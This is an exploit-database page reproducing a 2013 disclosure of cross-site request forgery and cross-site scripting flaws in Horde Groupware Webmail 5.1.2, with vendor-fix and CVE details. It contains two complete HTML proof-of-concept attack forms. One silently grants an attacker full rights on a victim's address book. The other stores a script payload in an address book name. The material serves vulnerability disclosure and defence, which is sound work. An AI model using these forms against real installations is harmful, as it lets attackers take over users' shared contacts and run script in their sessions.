Lucene search
K

Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)

🗓️ 08 Nov 2013 00:00:00Reported by Marcela BenetrixType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Horde Groupware Web Mail Edition 5.1.2 has CSRF vulnerabilities allowing attackers to change permissions and save malicious virtual Address Book with XSS

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Horde 5.1.2 CSRF / Cross Site Scripting Vulnerabilities
5 Nov 201300:00
zdt
0day.today
Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability
8 Nov 201300:00
zdt
Circl
CVE-2013-6364
8 Nov 201300:00
circl
CVE
CVE-2013-6364
5 Nov 201913:43
cve
Cvelist
CVE-2013-6364
5 Nov 201913:43
cvelist
Debian CVE
CVE-2013-6364
5 Nov 201913:43
debiancve
EUVD
EUVD-2013-6189
7 Oct 202500:30
euvd
exploitpack
Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)
8 Nov 201300:00
exploitpack
NVD
CVE-2013-6364
5 Nov 201914:15
nvd
OSV
CVE-2013-6364
5 Nov 201914:15
osv
Rows per page
#############################
Exploit Title : CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF Location

Change of permissions functionality was found to miss unique token in the form.


##########################
PoC
<html>

   <body>
     <form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner_input" value="kenedyK" />
       <input type="hidden"
name="u_names[||new_input]"
value="AttackerUserName" />
       <input type="hidden"
name="u_read[||new_input]" value="on" />
       <input type="hidden"
name="u_edit[||new_input]" value="on" />
       <input type="hidden"
name="u_delete[||new_input]" value="on" />
       <input type="hidden" name="g_names[||new]"
value="" />
       <input type="hidden" name="save_and_finish"
value="Save and Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>

Preconditions: The attacker must know the owner value which is the victim's username, and the ID of the address book. Once he gets them,  he can launch the attack.

###########################
CVE identifier

CVE-2013-6365.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12804
11/04/2013: Disclosure
#############################




Exploit Title : XSS and CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF/XSS Location

Save search as a virtual Address book was found to be vulnerable to XSS and CSRF attacks. 

##########################
POC

<html>
  <body>
    <form action="http://www.victim.com/horde/turba/search.php"
method="POST">
      <input type="hidden" name="source" value="" />
      <input type="hidden" name="criteria" value="" />
      <input type="hidden" name="val" value="" />
      <input type="hidden" name="search" value="Search" />
      <input type="hidden" name="save_vbook" value="on" />
      <input type="hidden" name="vbook_name"
value="<script>alert(1)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


###########################
CVE identifier

CVE-2013-6364 for the combination of problems that is exploited through the CSRF attack.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem http://bugs.horde.org/ticket/12803
11/04/2013: Disclosure

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Nov 2013 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 26.8
CVSS 3.18.8
EPSS0.01954
35